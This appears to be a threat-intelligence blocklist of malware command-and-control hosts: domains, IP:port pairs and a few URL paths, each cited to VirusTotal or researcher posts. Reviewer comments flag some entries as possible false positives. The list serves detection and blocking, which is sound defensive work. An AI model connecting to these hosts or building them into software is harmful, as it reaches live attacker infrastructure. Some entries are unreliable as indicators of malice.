privatproxy-endpoint.com
privatproxy-endpoint.xyz
privatproxy-schnellvpn.com
privatproxy-schnellvpn.xyz
wmail-blog.xyz
wmail-cdn.com
wmail-cdn.xyz
wmail-chat.com
wmail-chat.xyz
wmail-endpoint.com
wmail-endpoint.xyz
wmail-schnellvpn.com
wmail-schnellvpn.xyz

# Reference: https://twitter.com/ScumBots/status/1610836059171987458
# Reference: https://www.virustotal.com/gui/file/56ad36ce1198a3da04f1caaad5dce450dface16309df8757a61dfe87548bebc4/detection

35.247.134.103:22

# Reference: https://www.virustotal.com/gui/file/c47a352bbb2d61a67a96b07695d5b31568ae1f9e9cfd649637570289bffbb19f/detection

poisonhosting.live

# Reference: https://twitter.com/ScumBots/status/1614464983122706435
# Reference: https://www.virustotal.com/gui/file/7bc9afd562babf7e328c1264dd95ff88d62cef6e41d0b5b1a4265cd2ba3d12fd/detection

34.87.169.136:22

# Reference: https://twitter.com/ScumBots/status/1614548033575817218
# Reference: https://www.virustotal.com/gui/file/b90b8990514c7a059fc25d4f2d49e95c2b99ab63354af58fee859c1502d2bfca/detection

165.22.76.250:22

# Reference: https://www.virustotal.com/gui/file/f854ee6b89136167029b67a2b53c55d438df3099530b352d3e7766daaba9369d/detection

http://194.180.48.211

# Reference: https://twitter.com/malwrhunterteam/status/1615066293652029440
# Reference: https://www.virustotal.com/gui/file/97eb0366f9f0fe5d8e0b53a92c5b6b315e867634dc15a5f0155fc8fb2919c3a1/detection

enhanced-google.com

# Reference: https://twitter.com/drb_ra/status/1614775265619578880

185.111.207.102:8080

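# Reference: https://twitter.com/drb_ra/status/1615358787128545280
# NOTE(review): 185.193.126.28:443 is also listed in this file under the conexioninversa C2_Posh.txt reference; one of the two entries is redundant for matching.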

185.193.126.28:443

# Reference: https://twitter.com/malwrhunterteam/status/1615409256219480086
# Reference: https://www.virustotal.com/gui/file/68454ddcd864cd72fd03d0682f6a6e1e2cc0a2220ac1f3645dce6b4ffc801fb4/detection

lattescremato.xyz
miraistealer.xyz

# Reference: https://www.virustotal.com/gui/file/0dac98b37e63036bcd0ff0d8c1764337884b764895a9890b6fd3f6d449ef03c6/detection

russianmen75.top

# Reference: https://twitter.com/malwrhunterteam/status/1615801267913379841
# Reference: https://www.virustotal.com/gui/file/65d00e6ea3afb5ddc4c0a4e3939d08749c13ba1ccf7ebf00cd9426e3f2f0cf34/detection

164.92.162.96:1980
thelegendo.duckdns.org

# Reference: https://twitter.com/malwrhunterteam/status/1615815578886733829
# Reference: https://www.virustotal.com/gui/file/76dbc25ab7e6a68da4e09d7d5be440a81b12cbc756167fc1541a2d476b1d4c50/detection

188.132.130.60:8848

# Reference: https://www.virustotal.com/gui/file/ac3afc5b7972d04750df994044c154cfe1a8b14f66e1785d2d07683cf3ce515a/detection

healthnewsallover.com
hjordans.com

# Reference: https://www.virustotal.com/gui/file/04b3b20749f0368b84326c117709e00a7abdc2e1e2827a19765d07fb27192626/detection

bllsl1.shop

# Reference: https://www.rapid7.com/blog/post/2023/01/19/etr-cve-2022-47966-rapid7-observed-exploitation-of-critical-manageengine-vulnerability/

111.68.7.122:8080
111.68.7.122:8081
149.28.193.216:8080
149.28.193.216:8081
172.93.193.64:8080
172.93.193.64:8081

# Reference: https://twitter.com/drb_ra/status/1617150178691006464

141.145.213.10:443

# Reference: https://twitter.com/1ZRR4H/status/1617295296014471169
# Reference: https://www.virustotal.com/gui/file/3e09a109f1b6b8a7c4fff965aeceb874557835d2b25b6b38e2a1ee33f3896a29/detection

frun.digital
otun1.xyz

# Reference: https://twitter.com/nosecurething/status/1617598720048263168
# Reference: https://www.virustotal.com/gui/file/6795bc29e730807523a7896f7666a2b5d9bf9b3ec5175956aadb42370c26316f/detection
# Reference: https://www.virustotal.com/gui/file/30fde5ac8a0d9ae8892726c44cec9ae1b5461b5693674c51e0639b73c9840b25/detection
# Reference: https://www.virustotal.com/gui/file/2803be04664a8cbc029fa8ef12658468f9977cb7371e06649f2afa571640add0/detection

172.245.45.213:3235

# Reference: https://twitter.com/x0rPE/status/1617472916807102465
# Reference: https://tria.ge/230123-me8pvsee6y/behavioral2

http://194.110.247.26
http://45.86.86.13
194.110.247.26:443
45.86.86.13:443

# Reference: https://twitter.com/xorJosh/status/1617553360000897024

http://149.28.193.216
149.28.193.216:443

# Reference: https://www.virustotal.com/gui/file/385ce140ecdd905c02d2fed664260d4271fa59d5b3e8998730ec9ca9926d8857/detection

ads-check.com

# Reference: https://twitter.com/ScumBots/status/1618298988188340262
# Reference: https://www.virustotal.com/gui/file/90f7f2a6acaa52850e60eac82c37276cea12426a24f10cca944eaa6746cfeb65/detection

193.161.193.99:22049

# Reference: https://businessinsights.bitdefender.com/technical-advisory-proxyhell-exploit-chains-in-the-wild

http://172.86.123.228
http://64.44.168.92

# Reference: https://twitter.com/drb_ra/status/1618432623189151745

135.181.253.65:443

# Reference: https://twitter.com/r3dbU7z/status/1618940230756872200
# Reference: https://www.virustotal.com/gui/file/8bd2ae95df444e91d6f69cd4b8555928e8f456afd7cab4cbdf04949835296ff3/detection

letsdo19877.strangled.net

# Reference: https://www.virustotal.com/gui/file/0b0d87744aa21b7ed3a5cf738bd655f3aa4f9608f7a28a8ea55dee3ac5c3c838/detection

http://163.123.142.210

# Reference: https://www.virustotal.com/gui/file/b8f0ad8c5dcbf0dea665d7836fe8ec139d7156752971a41e314cd2ef67405195/detection

http://179.43.175.187

# Reference: https://twitter.com/Merlax_/status/1619375830240731137
# Reference: https://www.virustotal.com/gui/file/f50786ae8ef79be5751bb4a3ded7be56fc66eff90794594f6d13d6959a669d15/detection

http://193.47.61.200
193.47.61.200:3387

# Reference: https://www.virustotal.com/gui/file/7766d6f7cb261c2678fa6fb08096ec1a5c7169480cb6f01b583d41f926289ded/detection

156.251.172.22:5555

# Reference: https://www.virustotal.com/gui/file/9e33046dff56d64ce5df6ff69d79fc83392241cf89f34856516c0c3d3b71f51b/detection

156.251.172.22:7855

# Reference: https://www.virustotal.com/gui/file/b9124056b73e4974b94770aef72cd653a7f9f33db407b734930fc18d8b17862d/detection

156.251.172.22:8862

# Reference: https://www.virustotal.com/gui/file/87099fe915a8795c491d0617ce20d7d9617747d8dc03a90e0082ca680b147157/detection

192.241.142.215:8282

# Reference: https://twitter.com/ScumBots/status/1619915893072433154
# Reference: https://www.virustotal.com/gui/file/1d35d110df09bc6081201bdc0e22c40646ee5104959c7021f28603841f66c080/detection

92.47.181.173:25

# Reference: https://twitter.com/malwrhunterteam/status/1620130758328455168
# Reference: https://www.virustotal.com/gui/ip-address/185.200.191.77/relations
# Reference: https://www.virustotal.com/gui/file/db2455440bb46036cbb5b7652786e005a837f5e2784540faca0a5c198d8952e6/detection

docus.space
docustorein.com

# Reference: https://www.virustotal.com/gui/file/8dcb011381a43cc9501bb3209d7d2863b8efc8d4bcebbdef341653cbc19a5095/detection

drivestoragecloud.com

# Reference: https://www.virustotal.com/gui/file/4abd213238c149ad4bfce9c2ac0de09e2714f8515901640996063a768ba1ff16/detection

103.46.128.44:53158

# Reference: https://twitter.com/malwrhunterteam/status/1623396323893411840
# Reference: https://www.virustotal.com/gui/file/10dc75c51b92cfd98093ee6bb94a5cb5ec1ceab872cb026a9bb21696e966bd5b/detection

3.85.231.45:443
/n0/v1/buckets/default/ext-5dkJ19tFufpMZjVJbsWCiqDcclDw
/n0/v3/links/ping-beat/check

# Reference: https://twitter.com/malwrhunterteam/status/1623621074037489664
# Reference: https://www.virustotal.com/gui/file/b3efeaa272619d54a7224bc10257229c7b075c79e3a5eacc206cbd0e3a604409/detection
# Reference: https://www.virustotal.com/gui/file/78099c7fd0ed38c41b18d43ff81ab91ed9154d97f158aac938d2c110edc86548/detection
# Reference: https://www.virustotal.com/gui/file/47a8503a4ef87b577fc38ee67d21c150ac58d72e0dd36e3987d7d0b9dbddba5e/detection
# Reference: https://www.virustotal.com/gui/file/77928be787e85103d49a1c56d0ca07a479daabb532154022b05a9002fd4f213a/detection

43.135.172.12:1900

# Reference: https://twitter.com/drb_ra/status/1626755809282609152

cspecim.store
blog.cspecim.store

# Reference: https://twitter.com/r3dbU7z/status/1625651123414523905
# Reference: https://www.virustotal.com/gui/file/0e49e77c0c8642ed8859a99c14fec1680e5a2ac689f15134074a4629b8642283/detection
# Reference: https://www.virustotal.com/gui/file/1adc5f86acd494f70a9a7001ca94644b21118c5f87c5fbd3835572cadcdfcc9a/detection

172.245.142.98:3389
172.245.142.98:4545
172.245.142.98:60
172.245.142.99:3389
192.3.113.194:3389
htxbdz.com
mail4.htxbdz.com
mail5.htxbdz.com
mail6.htxbdz.com

# Reference: https://www.virustotal.com/gui/file/b300f2c9534c3c9012d1108b15cb8057a24196ff29d982455de48555902081b6/detection

154.247.92.203:55

# Reference: https://github.com/executemalware/Malware-IOCs/blob/main/2023-02-13%20Unknown%20Malware%20IOCs

http://46.161.40.72
/r/klf/5B876CA5C3AA0A7D

# Reference: https://www.virustotal.com/gui/file/18e254b9280a517c2cf84e73aaa23cdcf4d1e27b76deb37655d06c0a7ca5be8f/detection

3.141.210.37:17182

# Reference: https://www.virustotal.com/gui/file/794a7f6bb6bf9c1a2e0f47f36d0eb1b609f0d1de62dc50e859a6c62b77ded96c/detection

111.90.143.228:24

# Reference: https://twitter.com/ScumBots/status/1626214893740494851
# Reference: https://www.virustotal.com/gui/file/7bc2ba99e3289ac9d4939a56abfc90cb45c912aa0bed71f3084ad3cfa5898008/detection

31.210.55.103:41507

# Reference: https://twitter.com/ScumBots/status/1628016779451633664
# Reference: https://www.virustotal.com/gui/file/6c142b7ba9967a16d0a3a44ffd73713ca7cfd430eb79aa81f319e8165685528e/detection

134.122.51.63:22

# Reference: https://www.virustotal.com/gui/file/fd7d7fc9b18a81d921cd3bfa3b613f3558fcf4a31807146aa89a32776ff72954/detection

178.175.142.195:21288

# Reference: https://www.virustotal.com/gui/file/de9f00e68026508c42c1daf5fb77d78238ef01090b74d95e154aed8b8e0d5a0a/detection

178.175.142.195:57805

# Reference: https://twitter.com/malwrhunterteam/status/1628813529787555841
# Reference: https://www.virustotal.com/gui/file/d446a8aad146468b406229699b7614bfac715e1de2c8d0a6cdd626c677ee42c8/detection

wheufcvbheuywbfyhuwebfhuwef.africa
targetplay.wheufcvbheuywbfyhuwebfhuwef.africa

# Reference: https://twitter.com/ScumBots/status/1629738118159933445
# Reference: https://www.virustotal.com/gui/file/f3ac93766c4eab18906fcf0815eb01ad4409374e4736a855282237949a8ffafb/detection

34.126.190.114:22

# Reference: https://twitter.com/drb_ra/status/1629854149289422848

164.92.110.36:443

# Reference: https://www.virustotal.com/gui/file/9c1c570d490d67fde5689068726807b936d5fbe9a299a0760aa9d75e916e2305/detection

tequilamisorpresa.com/execution.php?tag=

# Reference: https://twitter.com/ScumBots/status/1630236404641824768
# Reference: https://www.virustotal.com/gui/file/000ebda7b9dbd9631ece03e1f6cddb887fe1f5913bbd04a241bc76ddf7618671/detection

34.87.98.110:22

# Reference: https://twitter.com/ScumBots/status/1630545929735401472
# Reference: https://www.virustotal.com/gui/file/b05e15ee98671f388cb1155a797e48cae944c01dd11179e5e295cdb45be3099c/detection

134.122.51.63:9001

# Reference: https://twitter.com/James_inthe_box/status/1630675575907164160
# Reference: https://app.any.run/tasks/4671f5c3-3ab2-403d-b1f6-416590ce1da0/
# Reference: https://www.virustotal.com/gui/file/416d0d7dbea6ad6e637e61a67301ffd3188af87d11e0ea7efe25e2a97e4eccf7/detection

miningpoolsforyou.com

# Reference: https://twitter.com/StopMalvertisin/status/1631318228722135047
# Reference: https://www.virustotal.com/gui/file/9a7061a539333e9f833a589197a60258ebb820bba5f1f29d5b31453e8e392d0f/detection

powpowpowff.blogspot.com

# Reference: https://twitter.com/1ZRR4H/status/1631651702763057152
# Reference: https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966

http://104.223.35.221
http://212.192.246.232
143.244.153.229:8090
146.70.126.178:57228
149.28.57.130:443
45.154.14.194:443
45.154.14.194:8080
160.20.147.145:8000
185.163.45.86:8000
45.146.7.20:8000
79.141.162.36:8888
80.85.156.184:8088
80.85.156.184:8085

# Reference: https://twitter.com/drb_ra/status/1631633081558859779

host.airmap.com

# Reference: https://twitter.com/ScumBots/status/1632754233039527936
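# Reference: https://www.virustotal.com/gui/file/1d14e967192870bd29053933049d2e96f39839bdc85eaf483b0e38bdd8ca51aa/detection
# NOTE(review): 28.0.0.0/8 is US DoD address space; 28.106.10.80 (listed in this file with ports 53, 14034 and 4444) may be a lab or placeholder address taken from the samples rather than reachable C2 - confirm.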

28.106.10.80:53

# Reference: https://www.virustotal.com/gui/file/c5a641335e86b0d3d2718e52a2ea2fa8ac69c8fbb490189a7d11373974daa2c3/detection

3.67.161.133:15914

# Reference: https://twitter.com/executemalware/status/1633610231484751873
# Reference: https://github.com/executemalware/Malware-IOCs/blob/main/2023-03-08%20Unknown%20Malware%20IOCs
# Reference: https://tria.ge/230224-vjmxysab33

http://159.223.101.65

# Reference: https://twitter.com/ScumBots/status/1633827558969212928
# Reference: https://www.virustotal.com/gui/file/a7f9be04c5f609331698b762f9454ad44cb4e6195e33dc5925e9b697c5e752c0/detection

20.100.194.20:8000

# Reference: https://twitter.com/ScumBots/status/1635503601907900417
# Reference: https://www.virustotal.com/gui/file/d0b836f5c561beeb92c457ce0d37347a5f5883ffb534f3b810c028b8f18517ca/detection

34.87.122.159:9001

# Reference: https://twitter.com/abuse_ch/status/1635711819397333000
# Reference: https://www.virustotal.com/gui/file/0555c8c1ad0e7f87671050f86a2895a8843fec5412a898a429e6010d3d0b5f15/detection

fuckallav.ru

# Reference: https://twitter.com/ScumBots/status/1636476259910729731
# Reference: https://www.virustotal.com/gui/file/ece46db4c34d9fa466905781dd4655db15ae3997318731a0dab51a2a026759aa/detection

28.106.10.80:14034

# Reference: https://twitter.com/ScumBots/status/1637076541208231937
# Reference: https://www.virustotal.com/gui/file/b9324465988881f24c0fcd158131e534f62bcaba7db23386616722910b2c6ce7/detection

34.124.206.184:9001

# Reference: https://twitter.com/ScumBots/status/1637076472086122496
# Reference: https://www.virustotal.com/gui/file/f306e739afa0e5ee265168997d7c34b9e7c901502d6585f24d93003a369f9457/detection

192.46.237.69:9001

# Reference: https://twitter.com/ScumBots/status/1637203552798900224
# Reference: https://www.virustotal.com/gui/file/89f447dc083895db8e1fdab06775de3a26aa5dfb87bee7000486cb5b4c6957c1/detection

28.106.10.80:4444

# Reference: https://twitter.com/jaydinbas/status/1637788868152885251
# Reference: https://www.virustotal.com/gui/file/25bc3c2c9ae8e0e65a93f52a4950056f584b6856514e2405a229e31633537983/detection

wjecpujpanmwm.tk

# Reference: https://twitter.com/drb_ra/status/1637793804030730244

d11jof8403sg9j.cloudfront.net

# Reference: https://www.virustotal.com/gui/file/ab9bd97e350f7131c358da0db0d78182e4b96790155b646dc773df96e317d5cd/detection

tdameretrust.com

# Reference: https://www.virustotal.com/gui/ip-address/212.87.204.124/relations
# Reference: https://www.virustotal.com/gui/file/ba770b2c7f3d106ec679220f3e6c4a433b03afd53c581100e8c959538b806ec6/detection

http://212.87.204.124
212.87.204.124:5555
datacenter11.myftp.org
shopdataserver4.sytes.net

# Reference: https://twitter.com/ScumBots/status/1639620733394636804
# Reference: https://www.virustotal.com/gui/file/b4d11693d3fb4604c6e8f03b4967117d1af261907760bd0f78237df7a701f182/detection

34.124.190.131:9001

# Reference: https://twitter.com/sicehice/status/1639101351635369986

http://54.177.246.246

# Reference: https://twitter.com/ScumBots/status/1641171832140189696
# Reference: https://www.virustotal.com/gui/file/a834e4bfd6830bb7e4327fddd04e5016a3205850c4e7ba93ee8eeb7f202bc2f0/detection

173.249.15.168:4445

# Reference: https://www.virustotal.com/gui/file/505c33f56fe6d317aaa10ae05a9484585391c7b46fb13f65442eb0e86c34dd43/detection

144.168.46.50:7000
worknow.con-ip.com

# Reference: https://twitter.com/keydet89/status/1646928107864207362

103.253.43.5:30580

# Reference: https://www.virustotal.com/gui/file/76f49e8ccba8a9195fe9b8f2e2ff80d1128565ad1f7e42e4755423feb77f1470/detection

faceappinc.com

# Reference: https://twitter.com/malwrhunterteam/status/1650469422404886528
# Reference: https://www.virustotal.com/gui/ip-address/128.140.1.67/relations
# Reference: https://www.virustotal.com/gui/file/5e79a0a4a891aa33b2255df4d171e1c51882fd33d03591f801442c06f9fd38a8/detection
# Reference: https://www.virustotal.com/gui/file/0968da23ead738f7a1dd25acb456b5c79d6f62d5a1b0a3bdb93d2b855418149f/detection
# Reference: https://www.virustotal.com/gui/file/8f9fa90f6de669f9492a1a524fbefdda74499f4a047539b0388575f07f14f909/detection

aghbh73ehefiv787ywe8ads.com
o8i9asf86v76t3y67t63gg.cn
ptiva.fun
rytha.top

# Reference: https://twitter.com/ScumBots/status/1649978986045349890
# Reference: https://www.virustotal.com/gui/file/c8e7181a5926feae8db19b5007326f00a6b2cbee18343576b5f18ef4d165aded/detection

62.171.159.243:8080

# Reference: https://twitter.com/pmelson/status/1650976633828921344
# Reference: https://twitter.com/pmelson/status/1650980285343825923

105.105.6.114:9000
eeeeeeee0000001.ddns.net

# Reference: https://www.virustotal.com/gui/file/7f5fb027de46a8cf2436d2e7a768150d63154cb02379ef34f504367cf3bb9cf4/detection

45.82.69.203:443

# Reference: https://twitter.com/ScumBots/status/1651275024358162438
# Reference: https://www.virustotal.com/gui/file/b5c6be6a443762f5173d0c675ccaabf556851f27b287c4fd4449b9c9c83556ea/detection

142.132.183.135:4444

# Reference: https://twitter.com/jaydinbas/status/1651632311937507329
# Reference: https://www.virustotal.com/gui/file/a58da133b8aedcdca44489bf5bac98a1257f050af186620c8c0bae110f1e672b/detection

storage-cloud.ddns.net

# Reference: https://www.virustotal.com/gui/file/3028df18abecde50bca9d535f5ed9603a69f90a3ef9dfe2cd48f3e52d70fda2f/detection

81.19.141.20:31338

# Reference: https://twitter.com/r3dbU7z/status/1652177054589132801

18.222.184.115:4443
tcspune.co

# Reference: https://twitter.com/ScumBots/status/1653008955302445059
# Reference: https://www.virustotal.com/gui/file/b04cbe549f89af4695e80f2cb4baef7b43b0b88e29647f13c9b3e3871496a1ee/detection

34.142.174.196:9001

# Reference: https://twitter.com/pmelson/status/1654202794792853504

http://89.108.99.150
95.163.240.184:8000

# Reference: https://www.virustotal.com/gui/file/1ad299cbd28b33a9990715d79a9e27ac900114b7466cc6838ec66aaa85a68070/detection

sifibv.fun

# Reference: https://www.virustotal.com/gui/file/e942269f4344075f700c66969e50065d70d9c8686dc020c7ead42cd28858e540/detection

194.213.3.170:7000
winhost.con-ip.com

# Reference: https://twitter.com/souiten/status/1658059802201964545
# Reference: https://www.virustotal.com/gui/file/0d70893cd0ac11d0620faed3ee22bf8db61c430ea3ff862045cd632e714e767f/detection

18.228.115.60:18632
18.231.93.153:18632
54.94.248.37:18632

# Reference: https://twitter.com/malwrhunterteam/status/1658197993273565187
# Reference: https://www.virustotal.com/gui/file/ff5d3736cb0f0d09bce42c5d6d6b6c4ac126a378028e4bd5c8ca8d47f3585530/detection

http://91.134.166.20
91.134.166.20:8888

# Reference: https://twitter.com/malwrhunterteam/status/1659483903399272448
# Reference: https://www.virustotal.com/gui/file/bcfb1cf90d507fbbc52217d35d84d3dd3c55bcc3cf825ef35e4b829525544b7c/detection
# Reference: https://www.virustotal.com/gui/file/a7317dfa2e5fd9bc944a84cd7fd72d943377b567cd186eeea2af5066b28ff0a9/detection

217.12.218.107:25928
217.12.218.107:30139

# Reference: https://x.com/malwrhunterteam/status/1911894843632071088
# Reference: https://www.virustotal.com/gui/ip-address/37.143.10.156/relations
# Reference: https://www.virustotal.com/gui/file/91834c3c11d6b48dab2938d347907d8ef8d0353092e0a32494875e50b100dc7d/detection

documents-drive.com
ducumentsrepository.info

# Reference: https://x.com/JAMESWT_WT/status/1912127891107643801
# Reference: https://www.virustotal.com/gui/file/44cb60c9bb448b33549b2002a84fd56483bbb17fab3f1d861a7f4256a063bbb5/detection

ms-coauth.com

# Reference: https://x.com/k3yp0d/status/1840737328681120219
# Reference: https://app.validin.com/detail?type=ip&find=45.147.228.17#tab=resolutions
# Reference: https://app.validin.com/detail?type=ip&find=45.61.133.102#tab=resolutions
# Reference: https://www.virustotal.com/gui/file/757fcc23a03ad93e5414ae62b910ec171286123a903472bc9bfe102ec9d30d78/detection

emotionsforsale.shop
onedriveview.shop
securedonline.net

# Reference: https://www.virustotal.com/gui/file/28060272b537b023d19c03baead2e218f53a65b66cfc2da8b1daa97b9647e8e5/detection

34.87.124.163:9001

# Reference: https://www.virustotal.com/gui/file/1add3c29ce97618963a134bf62210158e673bae68def105343c36553005d3ef1/detection
# Reference: https://www.virustotal.com/gui/file/7095b88ff7dd5f5c13ac2bcc59cf66cacdfb0b4190172edf6a91e3abdbc8faec/detection
# Reference: https://www.virustotal.com/gui/file/8190ddbfc7c18eebeb0c4444faf57b30b74f23f523b2e6330aac6f06aa233a6b/detection

http://144.91.82.35
144.91.82.35:1234
recon.wleberre.fr
traefik.wleberre.fr

# Reference: https://www.virustotal.com/gui/file/88a6c349783d253832cfe99a610cfd5232d9d542959930077850c9730acb5580/detection

193.161.193.99:24466

# Reference: https://www.virustotal.com/gui/file/54409d93f527e796b88c4ebdcf2224e8559cdc97e6720eb99ba04f1258d04477/detection

103.203.221.232:5555

# Reference: https://www.virustotal.com/gui/file/22c9e750c38078ccaa1ba4d54fdf08a8974304fd761620a164c8804f12601787/detection

3.125.209.94:18859

# Reference: https://www.virustotal.com/gui/file/7ea4f35d8d316416e7ae0e5b4fe5a67e48254a392af2ee372d17bb98646d0c8e/detection

34.142.250.168:9001

# Reference: https://www.virustotal.com/gui/file/522cf9ec022cd77ca08afe8c1b2d7ad468601193e98cec074034702db36d7a21/detection

http://194.55.224.183

# Reference: https://www.virustotal.com/gui/file/404b3b8eb3635f2d7d25794af53ee63870b8fa8b9f85e5cf65890964ffedd8b4/detection

arianpardaz.ir

# Reference: https://www.virustotal.com/gui/file/b069a9f636161914c000badcc2097eb195d2fb3c566f286d81bd803a1326b411/detection

http://185.106.93.175

# Reference: https://www.virustotal.com/gui/ip-address/121.127.33.21/relations
# Reference: https://www.virustotal.com/gui/file/8b987c555eeb667b602c7abf81205f3f3b8c585d7fd112f271548fa5adb2872b/detection

121.127.33.21:443
v4ink.shop

# Reference: https://twitter.com/ScumBots/status/1680564271149621249
# Reference: https://www.virustotal.com/gui/file/c01068e733eb7056b1c9c6ec8692c379c28fa775445755ee913153ca2e69fc6b/detection

77.74.198.52:5252

# Reference: https://www.virustotal.com/gui/file/09a230c8d2534c93ef9a87c0869bd5ba04cb2b0f2e6d5e3d767b5cc088e830a9/detection

35.183.18.77:4444

# Reference: https://www.virustotal.com/gui/file/4d854ff95d848fae253dd1803549268b190c1f8b422ab58470afa33720f21423/detection

194.26.135.112:443

# Reference: https://www.virustotal.com/gui/file/80c788e8b6f97287525c9d397811e6d06bc6f2bf6462635b3d4e47850a3ecd0b/detection

34.124.235.86:9001

# Reference: https://app.any.run/tasks/d2f4eb73-16d9-4c17-844e-a38aa4fd8833/

cff66d08-d3f8-42db-911c-ce670399a441.usrfiles.com

# Reference: https://www.virustotal.com/gui/file/0d0c3b34ca6fdea82bbc6997d4c9e76f5a10bb290bb75caaa40db2083c33bb85/detection

81.80.40.49:5567

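# Reference: https://www.virustotal.com/gui/file/767aab9584af0b1b5fa71311c60d8338bb696cabe1a94783eb4ac3c70e80872b/detection
# NOTE(review): fileless.ecsc23.hack.cert.pl looks like CTF challenge infrastructure under CERT Polska's
# cert.pl domain (presumably ECSC 2023) rather than attacker-controlled C2 - confirm before treating hits as malicious.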

195.164.49.184:5060
fileless.ecsc23.hack.cert.pl

# Reference: https://www.virustotal.com/gui/file/8b6d6e78ad91bbf07fa4bebbe2060d2bf3f5e0812133e38c45b95622a40a8ea9/detection

165.22.120.187:1337

# Reference: https://twitter.com/drb_ra/status/1682766283266244608
# Reference: https://app.any.run/tasks/a20b7b3b-993e-4fff-87cd-1ee4118d5107/

94.198.53.89:443
microsoft-support.zapto.org

# Reference: https://www.virustotal.com/gui/file/a127dc707f592712f4437a04b9a926e3972715c84a0a41d8810010c935e4a281/detection

azuremigration.westus3.cloudapp.azure.com

# Reference: https://www.virustotal.com/gui/file/1cad453ece89801b6a2390901855ae9795c0489252bc3738065a0b0dba990eb2/detection

http://192.169.69.69

# Reference: https://twitter.com/sicehice/status/1675995894716530690

167.172.75.230:443
167.172.75.230:8000

# Reference: https://www.virustotal.com/gui/file/fc4f9388511935eb60dd0ce6a20f2283ae2a3a3e0dcb82968216c007d2181d97/detection

89.189.163.174:4443

# Reference: https://twitter.com/sicehice/status/1687598958854524928

173.254.247.87:8080
192.210.174.143:8089

# Reference: https://www.virustotal.com/gui/file/c0e5098c8da2e4b299cde8eebb6dd9d584428ee85d7f045bace94a4c1cfbb341/detection

85.239.243.243:8080

# Reference: https://twitter.com/sicehice/status/1688562143770161152
# Reference: https://www.virustotal.com/gui/file/64a3aec5e48da6f14945e536895c2571d3bf3e55a779f01376ad76af85d764ad/detection

44.238.8.1:9001
starkiller.cc

# Reference: https://www.virustotal.com/gui/file/8b9c05a1e4a3b701bf8d2229a70bc83cc25b975ab16dbc2a2d0f98d319eeae0a/detection
# Reference: https://www.virustotal.com/gui/file/2d7834a739b77aabd8a7b9ce98a5bcf9a7deec15e6b1f3a921f7b3ad8a6d2d11/detection
# Reference: https://www.virustotal.com/gui/file/25a93411b5cc6b5162ae2410ed17e095393c2136de81626fbbe88906d5017602/detection

netdisk.780wow.com
netdisk.ddnsgeek.com

# Reference: https://twitter.com/malwrhunterteam/status/1689237232899502082

38.105.232.166:8080

# Reference: https://www.virustotal.com/gui/file/6c5816812ad2b8dcf1bdf8e7a393c283202f85b1c998c899639579c3458abc26/detection

77.74.198.52:8083

# Reference: https://www.gdatasoftware.com/blog/2019/07/35061-server-side-polymorphism-powershell-backdoors
# Reference: https://otx.alienvault.com/pulse/5d2da19e3055b91559471028

adm.esurf.info
green.4107irishivy.info
green.dddownhole.com
green.nogel.tech
red.1407cty13pec.com
red.340airport.com
sad.childrensliving.com
space.4fallingstar.info
stats.emeraldsurfwatermanagement.com
wws.rheovesthr.com

# Reference: https://twitter.com/sicehice/status/1689823307351146496

146.190.92.173:8000
159.65.140.154:443
159.65.140.154:8000

# Reference: https://twitter.com/ScumBots/status/1690282049406464000
# Reference: https://www.virustotal.com/gui/file/a1d92d7aaf76c140263408d888b089932b91ddbd647ed62370d717b051e3ca93/detection

146.70.158.173:8080

# Reference: https://github.com/conexioninversa/WOPR/blob/main/C2_Posh.txt (# 2023-08-12)

103.230.142.243:443
3.70.143.123:443
3.78.75.167:443
62.182.159.155:443

# Reference: https://twitter.com/ScumBots/status/1691170399625572353
# Reference: https://www.virustotal.com/gui/file/e606be399e9435970268ba6f0e552f6426b229ff62a30fd61256733282937261/detection

96.27.38.90:443

# Reference: https://twitter.com/ULTRAFRAUD/status/1692807375395094961
# Reference: https://www.virustotal.com/gui/file/a70d2999b817814f006a7f3e0bda9a69e8be0d4835e9c03cc3d39aa3e0a510e7/detection
# Reference: https://www.virustotal.com/gui/file/a8a9859f09378a4efd8802691e6ddf6aa0ae9fd4182149cee44c2fc0beb98fbb/detection

103.145.13.69:13337
103.145.13.69:8181
h4ck0ps.cc
vms.h4ck0ps.cc

# Reference: https://twitter.com/sicehice/status/1694535541671268748

http://35.174.153.211
35.174.153.211:443

# Reference: https://twitter.com/sicehice/status/1694542540563755127

38.145.203.20:8000

# Reference: https://twitter.com/sicehice/status/1694546485864435835

95.163.168.155:8000

# Reference: https://twitter.com/sicehice/status/1694537861012267015

37.59.41.105:8080

# Reference: https://twitter.com/ScumBots/status/1694590454094787006
# Reference: https://www.virustotal.com/gui/file/b312edcf516092e0b3caecc4f75e30f8c893d995fecceeccb1a82c5d622af3ed/detection

http://43.142.102.110

# Reference: https://twitter.com/drb_ra/status/1696696188978745773

45.79.196.203:443

# Reference: https://www.virustotal.com/gui/file/01bb93056a4e243f6c65298f68568819a0719abd56ed9c271bd53009a3a47542/detection

cg7cy082vtc00008r4sggedsxyeyyyyyb.oast.fun

# Reference: https://twitter.com/ScumBots/status/1698926512676757876
# Reference: https://www.virustotal.com/gui/file/6ab9f03168ef97048e9a4c38572a5c3491550ecc207ad6794a0af14dbe262b22/detection

103.189.234.23:8080

# Reference: https://twitter.com/ScumBots/status/1699749435872346462
# Reference: https://www.virustotal.com/gui/file/fce494b4dbbadbfc64925ac00092a8465ccb2c7ec18153798fac517ae9289f90/detection

173.44.141.140:443

# Reference: https://twitter.com/ScumBots/status/1700053942464360662
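# Reference: https://www.virustotal.com/gui/file/4210fb29431b8f05f68b2b488454cd3d7db8b5fcf8a723fbbc9434073385f3ba/detection
# NOTE(review): 11.0.0.0/8 is US DoD-allocated space that some networks reuse for internal addressing.
# The address below may be a lab/internal value from the sample - verify, and expect possible false positives.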

11.239.125.213:5439

# Reference: https://twitter.com/ScumBots/status/1699466347053281617
# Reference: https://www.virustotal.com/gui/file/8280fc83a755f6b9e8a8ba8895d00f5c9f6537815246bcd037436f6efa123ce5/detection

1.15.157.229:8080

# Reference: https://www.virustotal.com/gui/file/7e1180455a5558850a07f4ce55b245f948fe8cbd234585999e55c6ac33f26d49/detection

156.223.95.69:4444
0x0.sytes.net

# Reference: https://www.virustotal.com/gui/file/35192d4d74912cc9fcc11fb8ddb9f7623017433ed6dcab72e7386fd5d5a3e419/detection
# Reference: https://www.virustotal.com/gui/file/7775055c940a803de65a81a6b8948b8d0bb2e362fdc241535becf00c73e6a0d4/detection

http://103.68.109.31
103.68.109.31:1337

# Reference: https://twitter.com/r3dbU7z/status/1705654727176777736

138.201.121.107:2222

# Reference: https://twitter.com/jaydinbas/status/1706289240781308236

macores.com

